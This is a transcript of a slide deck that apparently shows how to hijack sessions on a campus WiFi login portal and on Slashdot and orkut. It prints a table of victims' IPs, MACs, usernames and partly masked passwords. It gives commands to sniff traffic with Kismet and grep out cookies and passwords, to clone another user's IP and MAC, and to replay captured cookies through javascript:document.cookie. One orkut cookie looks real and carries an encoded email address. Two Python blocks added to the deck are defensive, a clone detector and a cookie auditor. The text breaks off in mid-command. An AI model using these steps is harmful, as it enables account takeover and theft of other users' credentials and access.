smit wifi_2


Post on 25-May-2015


TRANSCRIPT

1. Down the rabbit-hole

  • A sneak peek at the SMIT-WiFi implementation
  • Amit Saraff
  • Ashish Shekhar

2. Tools Used

  • Nmap network scanner
  • Wireshark / Ethereal - packet analyzer
  • Kismet wireless sniffer
  • BurpSuite proxy (http header modifier)
  • Firefox web-browser
    • Live HTTP Headers
    • User Agent Switcher
    • Tamper Data
    • View Cookie CS
    • NoScript
  • Unix tools: wget, curl, ssh, ifconfig, etc.
  • Intel Centrino-based laptop running Slackware 9

3. Brief Overview

  • IP range: 172.16.183.0/22
  • WEP / WPA no (yes !!)
  • 4 different ESSIDs:
    • SMITWiFi1
    • SMITWiFi2
    • SMITWiFi3
    • SMITWiFi4
    • Different ESSIDs / same channel ??

4. Brief Overview (cont..)

  • 172.16.183.1 router / DNS resolver / authenticator
  • 172.16.183.2 802.11b Access Point
  • 172.16.183.3 D-link DWL-900 AP+ (standard 802.11bg ap)
  • 172.16.183.4 (new) Another access-point ?

5. Initial Monitoring

  • E-mail accounts
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]

6. Initial Monitoring (cont..)

  • and web addresses
    • www.orkut.com
    • www.cisco.com
    • www.wipro.com
    • www.musicgamesrefer.com
    • www.grisoft.com
    • www.yahoo.com
    • And some more orkut !!

7. But that's not what we are looking for !!

8. Wall of Sheep

  IP              MAC                User   Password
  172.16.183.15   00:12:f0:db:ef:6f  d205a  m_-_-i
  172.16.183.23   00:12:f0:64:0a:67  g205a  b_-_i
  172.16.183.78   00:13:ce:7b:d7:9b  d108a  1_3
  172.16.183.116  00:16:ce:54:69:48  b206a  j_-n
  172.16.183.117  00:12:f0:56:b7:3f  k205a  n_-_-_-w
  172.16.183.149  00:15:00:22:c4:0f  l205a  p_-_-_-_4
  172.16.183.155  00:13:02:43:2b:0d  r305a  r_-_-_a
  172.16.183.180  00:12:f0:51:3b:e0  j301a  h_-_-_-a

  ** and this is just a small part of the list

  • How about some user account details?

9. So how did this happen ?

10. 172.16.183.1 Authentication Server

11. Talk about multi-platform support

12. User Agent Switcher to the rescue

13. Background magic how it really works

14. How hard is it?

  • Log the network traffic using Kismet
  • And run:
    strings Kismet*.dump | grep Cookie | egrep '_Pass=[a-zA-Z0-9]+;'
  • to get:
    Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
    Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

15. But that isn't very ethical

  • Problem: How to get access to the internet without compromising another's account?
  • Solution: Study the entire process and find a work-around.

16. Brief Introduction to Cookies

  • No, not these cookies

17. So what are they ?

  • Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.
  • Used for authenticating, tracking and maintaining specific information about users.
  • We saw an example 2-3 slides back.
    • For those who missed it, here it is again:
    Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

18. How do they help?

  • The SMIT server sets a cookie on each client it authenticates.
  • Refreshes it every 180 seconds.
  • How do I then get this cookie ?
  • And how will it help even if I do manage to capture it ?

19. Step 1

  • Find active hosts on the network: enter 'Kismet'

20. Step 1 (cont..)

21. Step 2

  • Select an active host and note parameters, i.e. IP address and MAC address.

22. Step 2 (cont..)

  • Change settings locally to match host about to be compromised. For eg:
    ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4
    route add default gw 172.16.183.1

23. Step 3

  • Fire up your browser, Firefox in our case.
  • Type in the following URL:
    http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null
  • This acts as a 'refresh' command to the server which replies back with the validated cookie.

24. ..to get

25. ..and we are online

26. Step 3 (cont..)

  • What this does :
    • Sets you up with the cookie
    • Refreshes itself every 180 seconds
    • Voila, you have free internet access (until the guy logs off / you log him off)
  • Node goes offline ?
    • Rinse and repeat the entire process with another IP.
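As an added detection example (not part of the deck): the IP/MAC clone in Step 2 leaves a fingerprint on the access-point side, because the victim's radio and the cloner's radio now both carry frames for the same station MAC. The log format here is hypothetical and the lines are constructed; the AP addresses are the ones from slide 4.

```python
"""Spot a station MAC that is live on two access points at once.

Added detection example (not from the deck). Log format is hypothetical;
the lines below are constructed. AP addresses are the ones listed on
slide 4 (172.16.183.2 and 172.16.183.3).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One line per data frame an AP saw from a station ("seen" events only).
# ...aa is a victim whose IP+MAC a second radio on AP .3 has cloned;
# ...bb is an ordinary client that roams from AP .3 to AP .2 and stays.
SAMPLE_LOG = """\
2007-09-13 10:00:01 ap=172.16.183.2 sta=02:00:00:00:00:aa event=seen
2007-09-13 10:00:05 ap=172.16.183.3 sta=02:00:00:00:00:bb event=seen
2007-09-13 10:00:20 ap=172.16.183.3 sta=02:00:00:00:00:aa event=seen
2007-09-13 10:00:35 ap=172.16.183.2 sta=02:00:00:00:00:aa event=seen
2007-09-13 10:00:40 ap=172.16.183.2 sta=02:00:00:00:00:bb event=seen
2007-09-13 10:01:10 ap=172.16.183.2 sta=02:00:00:00:00:bb event=seen
"""

LINE = re.compile(r"^(\S+ \S+) ap=(\S+) sta=(\S+) event=seen$")
WINDOW = timedelta(seconds=60)   # how far back to look for AP switches
MIN_SWITCHES = 2                 # A->B is roaming; A->B->A means two radios


def parse(log):
    """Yield (timestamp, ap, sta) for every well-formed 'seen' line."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3).lower()


def find_cloned_stations(log, window=WINDOW, min_switches=MIN_SWITCHES):
    """Return {sta: first alert time} for MACs that ping-pong between APs."""
    history = defaultdict(deque)  # sta -> recent (ts, ap) pairs inside window
    alerts = {}
    for ts, ap, sta in parse(log):
        h = history[sta]
        h.append((ts, ap))
        while ts - h[0][0] > window:  # drop observations older than window
            h.popleft()
        switches = sum(a != b for (_, a), (_, b) in zip(h, list(h)[1:]))
        if switches >= min_switches and sta not in alerts:
            alerts[sta] = ts
    return alerts


if __name__ == "__main__":
    for sta, ts in find_cloned_stations(SAMPLE_LOG).items():
        print(f"{ts} possible IP/MAC clone: {sta} active on two APs")
```

A single A->B switch is treated as normal roaming; only a MAC that bounces back to the first AP inside the window is reported.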

27. Return to cookie-land

  • Authentication mechanisms
    • We just saw an abuse of the implicit trust mechanism guaranteed by cookies
    • But that was local
    • Can it be extended to other sites too?

28. Presenting Slashdot

  • Popular technology portal.
  • News site for anything regarding Technology / Linux / Politics / Science / YRO (Your Rights Online) and more.
  • Uses HTTP-POST mechanism for sending authentication data.

29. The main page

30. Login page

31. Cookie

32. Exploit

  • To authenticate as that user, simply capture the incoming cookie
  • Then in the address-bar type in:
    javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org;Path=/';
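As an added example (not code from the deck), a small Set-Cookie auditor that flags the four properties slides 17-18 and 31-32 rely on: a credential carried in the cookie itself (the portal's `_Pass`), no Secure flag so the cookie crosses the open WLAN in clear, no HttpOnly so `document.cookie` can read or set it, and no expiry so a captured value replays indefinitely; `issue_session_cookie` shows the hardened form. The sample headers are constructed to mirror the cookie formats on the slides.

```python
"""Audit Set-Cookie headers for the weaknesses the deck exploits.

Added example, not code from the deck. The sample headers are
constructed to mirror the cookie formats shown on the slides.
"""
import re
import secrets

# Cookie names that suggest a credential is being handed to the browser.
CREDENTIAL_NAME = re.compile(r"pass(word|wd)?$|pwd$|secret$", re.I)

SAMPLE_SET_COOKIES = [
    "_UserName=m301a; Path=/",                              # portal: username in clear
    "_Pass=123; Path=/",                                    # portal: password in clear
    "JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293; Path=/",  # bare session id
    "user=CONSTRUCTED; Domain=.slashdot.org; Path=/",       # replayable site cookie
]


def parse_set_cookie(header):
    """Return (name, value, {attribute_lower: value}) for one Set-Cookie value."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit(header):
    """Return a list of findings for one Set-Cookie header; empty means clean."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if CREDENTIAL_NAME.search(name):
        findings.append("credential stored in cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: crosses plaintext HTTP / open WLAN in clear")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable and settable via document.cookie")
    if "max-age" not in attrs and "expires" not in attrs:
        findings.append("no expiry: a captured value replays for the whole session")
    return findings


def issue_session_cookie(ttl_seconds=180):
    """Hardened form: random token, no credential, Secure + HttpOnly, short TTL."""
    token = secrets.token_urlsafe(32)
    return f"sid={token}; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age={ttl_seconds}"


if __name__ == "__main__":
    for header in SAMPLE_SET_COOKIES + [issue_session_cookie()]:
        print(header.split(";")[0], "->", audit(header) or "OK")
```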

33. Result ?

34. So what ? But then that is hardly any sweat !!

35. Moving on - orkut.com

  • What is orkut ?
    • Social networking site.
    • Online community to meet new people and keep in touch with old ones.
    • Now part of the Google empire.
    • Open on at least 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.

36. Main page.

37. First observations.

  • Note
    • The address-bar is yellow and there is a lock-sign on the taskbar.
    • What it means :
      • Site uses Secure-HTTP (Port 443 / https)
      • Certificate for validation (AES-256 bit encryption)
      • Trusted certificate issuer: Thawte Consulting cc.
    • Actual login frame URL:
    https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvpage=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

38. In other words, that information is definitely not being cracked anytime soon.

39. Cookies, again?

  • Cookie generated on login :

40. Cookies, again ? (cont..)

  • 2 cookies set by the orkut domain
    • First one seems to be a user preference cookie
    • Second one is for timezone (??)

41. Cookie (1)

  • Question : Does Cookie 1 alone do the trick then ?
  • Solution : Grab another cookie and check.

42. Back to kismet dumps

  • Hunt for a cookie in the previous gathered logs.
    strings Kismet-*dump | grep Cookie | grep -i orkut
  • To get :
    • Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

43. Set this cookie

  • javascript:document.cookie=' orkut_st